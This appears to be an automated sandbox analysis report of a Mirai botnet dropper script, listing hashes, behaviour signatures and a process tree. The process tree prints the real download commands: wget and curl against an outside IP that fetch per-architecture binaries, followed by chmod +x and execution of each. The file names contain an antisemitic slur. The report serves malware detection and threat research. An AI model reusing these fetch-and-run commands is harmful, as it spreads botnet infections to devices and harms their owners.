Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    06/12/2024, 13:19

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    49377a7c5220a2e428c4ff6898fcd50c

  • SHA1

    0d2843613a97cc150c539474b2db2ff741260997

  • SHA256

    336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c

  • SHA512

    51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (110274) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 16 IoCs
  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://93.123.85.78/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://93.123.85.78/bins/jew.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:727
    • /bin/cat
      cat jew.x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-6yI04G
        2⤵
        • File and Directory Permissions Modification
        PID:738
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:739
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:741
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:744
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-6yI04G
        2⤵
        • File and Directory Permissions Modification
        PID:745
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:746
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:748
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:749
      • /bin/cat
        cat jew.mpsl
        2⤵
          PID:750
        • /bin/chmod
          chmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-6yI04G
          2⤵
          • File and Directory Permissions Modification
          PID:751
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Changes its process name
          PID:752
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm4
          2⤵
            PID:755
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.arm4
            2⤵
            • Writes file to tmp directory
            PID:758
          • /bin/chmod
            chmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-6yI04G
            2⤵
            • File and Directory Permissions Modification
            PID:760
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:761
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.arm5
            2⤵
            • Writes file to tmp directory
            PID:840
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.arm5
            2⤵
            • Writes file to tmp directory
            PID:842
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-6yI04G
            2⤵
            • File and Directory Permissions Modification
            PID:844
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:845
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.arm6
            2⤵
            • Writes file to tmp directory
            PID:851
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.arm6
            2⤵
            • Writes file to tmp directory
            PID:854
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:856
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:857
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.arm7
            2⤵
            • Writes file to tmp directory
            PID:862
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.arm7
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:863
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:865
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:866
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.ppc
            2⤵
            • Writes file to tmp directory
            PID:869
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.ppc
            2⤵
            • Writes file to tmp directory
            PID:872
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:874
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:875
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.m68k
            2⤵
            • Writes file to tmp directory
            PID:878
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.m68k
            2⤵
            • Writes file to tmp directory
            PID:881
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:883
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:884
          • /usr/bin/wget
            wget http://93.123.85.78/bins/jew.sh4
            2⤵
            • Writes file to tmp directory
            PID:887
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.sh4
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:890
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:892
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:893

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/jewn

          Filesize

          60KB

          MD5

          ec9bf54e29277d9028ea800cf3cf7501

          SHA1

          371485bf2f9f86e25e618fcb98071b3f6c8524a8

          SHA256

          19385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2

          SHA512

          87e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9

        • /tmp/jewn

          Filesize

          125KB

          MD5

          c5ac3c0d137d7a994fb24f0d05335848

          SHA1

          1aca371b36bf8170bdc06e7014a5aef1c89ac0d9

          SHA256

          bd1585f0afe62dc9966151ce8f722958b21846e3a164dad19cf266a14bb5075d

          SHA512

          2dd5eedb9f9e1967db8a8025435f4bd9781592342e27ee66dd64c3ed63ec688b83adaff3995cece7f59c7acb68d93bcd2fbbdce35b94e318b9a955cb0dd64c80

        • /tmp/jewn

          Filesize

          118KB

          MD5

          7987a5e42d1c90453c28ccd9ed89c03e

          SHA1

          629a14c862594d2cea7e09e26c5da9805ce7274b

          SHA256

          97e0d7a8e3c63baa4512449645728f4f1b62ee804959f8ab4123f439f8b14f77

          SHA512

          44492d04c00060c961d0d717bbfa2ffd04b81b97ef34c480dc71d72fa4af51f031384d1d0161f0d6b9ec86471c3bc9e705c5b0af3a75b3a447a9beae8730327a